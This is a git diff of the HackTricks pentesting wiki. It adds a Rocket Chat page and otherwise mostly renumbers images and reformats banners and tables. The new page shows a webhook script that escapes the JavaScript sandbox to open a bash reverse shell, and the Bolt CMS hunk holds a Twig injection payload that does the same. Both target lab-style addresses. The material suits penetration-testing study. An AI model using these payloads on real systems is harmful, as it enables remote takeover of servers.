diff --git a/.gitbook/assets/image (1) (1) (2) (1).png b/.gitbook/assets/image (1) (1) (2) (1).png
new file mode 100644
index 000000000..261b7c009
Binary files /dev/null and b/.gitbook/assets/image (1) (1) (2) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (2).png b/.gitbook/assets/image (1) (1) (2).png
index 261b7c009..ae902527d 100644
Binary files a/.gitbook/assets/image (1) (1) (2).png and b/.gitbook/assets/image (1) (1) (2).png differ
diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png
index ae902527d..76ed9278a 100644
Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index 76ed9278a..bbff6c5f4 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (2) (2) (1).png b/.gitbook/assets/image (2) (2) (2) (1).png
new file mode 100644
index 000000000..64b0c5b0d
Binary files /dev/null and b/.gitbook/assets/image (2) (2) (2) (1).png differ
diff --git a/.gitbook/assets/image (2) (2) (2).png b/.gitbook/assets/image (2) (2) (2).png
index 64b0c5b0d..8cbefda25 100644
Binary files a/.gitbook/assets/image (2) (2) (2).png and b/.gitbook/assets/image (2) (2) (2).png differ
diff --git a/.gitbook/assets/image (2) (2).png b/.gitbook/assets/image (2) (2).png
index 8cbefda25..37e88406f 100644
Binary files a/.gitbook/assets/image (2) (2).png and b/.gitbook/assets/image (2) (2).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 37e88406f..163b502de 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (2) (1) (1).png b/.gitbook/assets/image (3) (2) (1) (1).png
new file mode 100644
index 000000000..d6d915b35
Binary files /dev/null and b/.gitbook/assets/image (3) (2) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (2) (1).png b/.gitbook/assets/image (3) (2) (1).png
index d6d915b35..884a59fd2 100644
Binary files a/.gitbook/assets/image (3) (2) (1).png and b/.gitbook/assets/image (3) (2) (1).png differ
diff --git a/.gitbook/assets/image (3) (2).png b/.gitbook/assets/image (3) (2).png
index 884a59fd2..9a74fb3f3 100644
Binary files a/.gitbook/assets/image (3) (2).png and b/.gitbook/assets/image (3) (2).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index 9a74fb3f3..8a4bb9a4a 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (7).png b/.gitbook/assets/image (4) (7).png
new file mode 100644
index 000000000..5fd0b4257
Binary files /dev/null and b/.gitbook/assets/image (4) (7).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 5fd0b4257..fce3191e9 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 8a4bb9a4a..eb57ea914 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index df2ee5c38..f2a2e2970 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -355,6 +355,7 @@
* [PHP - RCE abusing object creation: new $\_GET\["a"\]($\_GET\["b"\])](network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md)
* [PHP SSRF](network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md)
* [Python](network-services-pentesting/pentesting-web/python.md)
+ * [Rocket Chat](network-services-pentesting/pentesting-web/rocket-chat.md)
* [Special HTTP headers](network-services-pentesting/pentesting-web/special-http-headers.md)
* [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
* [Symfony](network-services-pentesting/pentesting-web/symphony.md)
diff --git a/network-services-pentesting/pentesting-web/bolt-cms.md b/network-services-pentesting/pentesting-web/bolt-cms.md
index b770ab97a..478944e6b 100644
--- a/network-services-pentesting/pentesting-web/bolt-cms.md
+++ b/network-services-pentesting/pentesting-web/bolt-cms.md
@@ -19,7 +19,7 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in
* Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`
* Check the value of theme
-
+
* Select `File management` -> `View & edit templates`
* Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig`
@@ -27,7 +27,7 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in
* Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* And save changes
-
+
* Clear the cache in `Maintenance` -> `Clear the cache`
* Access again the page as a regular user, and the payload should be executed
diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md
new file mode 100644
index 000000000..b18745455
--- /dev/null
+++ b/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -0,0 +1,57 @@
+# Rocket Chat
+
+
+
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
+
+## RCE
+
+If you are admin inside Rocket Chat you can get RCE.
+
+* Got to **`Integrations`** and select **`New Integration`** and choose any: **`Incoming WebHook`** or **`Outgoing WebHook`**.
+ * `/admin/integrations/incoming`
+
+
+
+* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like:
+
+```javascript
+const require = console.log.constructor('return process.mainModule.require')();
+const { exec } = require('child_process');
+exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
+```
+
+* Configure the WebHook (the channel and post as username must exists):
+
+
+
+* Configure WebHook script:
+
+
+
+* Save changes
+* Get the generated WebHook URL:
+
+
+
+* Call it with curl and you shuold receive the rev shell
+
+
+
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index 81ee548b7..7c696a18f 100644
--- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -2,13 +2,13 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -422,7 +422,7 @@ In the CTF, you **couldn't access the stderr** of the java application using log
Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:
- (2) (1).png>)
+ (2) (1) (1).png>)
This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.
@@ -482,12 +482,12 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
index c9ee16db1..5921c5672 100644
--- a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
+++ b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
@@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
@@ -281,7 +281,7 @@ In this case the attacker **won't receive the response timeout until he has send
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
-
+
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
@@ -329,7 +329,7 @@ tc qdisc add dev eth0 parent 1:3 handle 10: netem delay 61s
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
diff --git a/pentesting-web/phone-number-injections.md b/pentesting-web/phone-number-injections.md
index c75ba2c66..b3707cc58 100644
--- a/pentesting-web/phone-number-injections.md
+++ b/pentesting-web/phone-number-injections.md
@@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
@@ -12,7 +12,7 @@
-It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
+It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
@@ -20,7 +20,7 @@ It's possible to **add strings at the end the phone number** that could be used
**OTP Bypass / Bruteforce** would work like this:
-
+
## References
@@ -28,7 +28,7 @@ It's possible to **add strings at the end the phone number** that could be used
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index 198e7a9c0..e6d0f34af 100644
--- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
@@ -160,7 +160,7 @@ Use to bypass WAFs:
```
-
+
* Full account takeover by reflecting cookies
@@ -260,7 +260,7 @@ Check the XSLT page:
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index 34513e944..710a8e766 100644
--- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
@@ -16,7 +16,7 @@
Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised.
-
+
## Sub-GHz hardware
@@ -72,7 +72,7 @@ By default **Read Raw is also in 433.92 in AM650**, but if with the Read option
### Brute-Force
-If you know the protocol used for example by the garage door it's possible to g**enerate all the codes and send them with the Flipper Zero.** This is an example that support general common types of garages: [**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)****
+If you know the protocol used for example by the garage door it's possible to g**enerate all the codes and send them with the Flipper Zero.** This is an example that support general common types of garages: [**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)\*\*\*\*
### Add Manually
@@ -82,22 +82,22 @@ Add signals from a configured list of protocols
#### List of [supported protocols](https://docs.flipperzero.one/sub-ghz/add-new-remote)
-| Princeton\_433 (works with the majority of static code systems) | 433.92 | Static |
-| ---------------------------------------------------------------- | ------ | ------- |
-| Nice Flo 12bit\_433 | 433.92 | Static |
-| Nice Flo 24bit\_433 | 433.92 | Static |
-| CAME 12bit\_433 | 433.92 | Static |
-| CAME 24bit\_433 | 433.92 | Static |
-| Linear\_300 | 300.00 | Static |
-| CAME TWEE | 433.92 | Static |
-| Gate TX\_433 | 433.92 | Static |
-| DoorHan\_315 | 315.00 | Dynamic |
-| DoorHan\_433 | 433.92 | Dynamic |
-| LiftMaster\_315 | 315.00 | Dynamic |
-| LiftMaster\_390 | 390.00 | Dynamic |
-| Security+2.0\_310 | 310.00 | Dynamic |
-| Security+2.0\_315 | 315.00 | Dynamic |
-| Security+2.0\_390 | 390.00 | Dynamic |
+| Princeton\_433 (works with the majority of static code systems) | 433.92 | Static |
+| --------------------------------------------------------------- | ------ | ------- |
+| Nice Flo 12bit\_433 | 433.92 | Static |
+| Nice Flo 24bit\_433 | 433.92 | Static |
+| CAME 12bit\_433 | 433.92 | Static |
+| CAME 24bit\_433 | 433.92 | Static |
+| Linear\_300 | 300.00 | Static |
+| CAME TWEE | 433.92 | Static |
+| Gate TX\_433 | 433.92 | Static |
+| DoorHan\_315 | 315.00 | Dynamic |
+| DoorHan\_433 | 433.92 | Dynamic |
+| LiftMaster\_315 | 315.00 | Dynamic |
+| LiftMaster\_390 | 390.00 | Dynamic |
+| Security+2.0\_310 | 310.00 | Dynamic |
+| Security+2.0\_315 | 315.00 | Dynamic |
+| Security+2.0\_390 | 390.00 | Dynamic |
### Supported Sub-GHz vendors
@@ -120,7 +120,7 @@ Get dBms of the saved frequencies
-HackTricks in 🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
+HackTricks in🐦 Twitter 🐦 - 🎙️ TwitchWed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
diff --git a/todo/radio-hacking/sub-ghz-rf.md b/todo/radio-hacking/sub-ghz-rf.md
index dd6270c4f..cb2850e43 100644
--- a/todo/radio-hacking/sub-ghz-rf.md
+++ b/todo/radio-hacking/sub-ghz-rf.md
@@ -27,7 +27,7 @@ In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz.
If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins:
-
+
and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.**
diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index 6586868b6..274e36952 100644
--- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -413,7 +413,7 @@ Enterprise CAs also **store CES endpoints** in their AD object in the `msPKI-Enr
certutil.exe -enrollmentServerURL -config CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA
```
-
+
```powershell
Import-Module PSPKI
.png)
 (1).png)
.png)
.png)
.png)
 (1) (2).png)
 (1) (2) (1).png)
.png)
.png)
 (2).png)
.png)
 (7).png)
 (2).png)
 (2) (1).png)
 (2) (2).png)
 (2) (2) (1).png)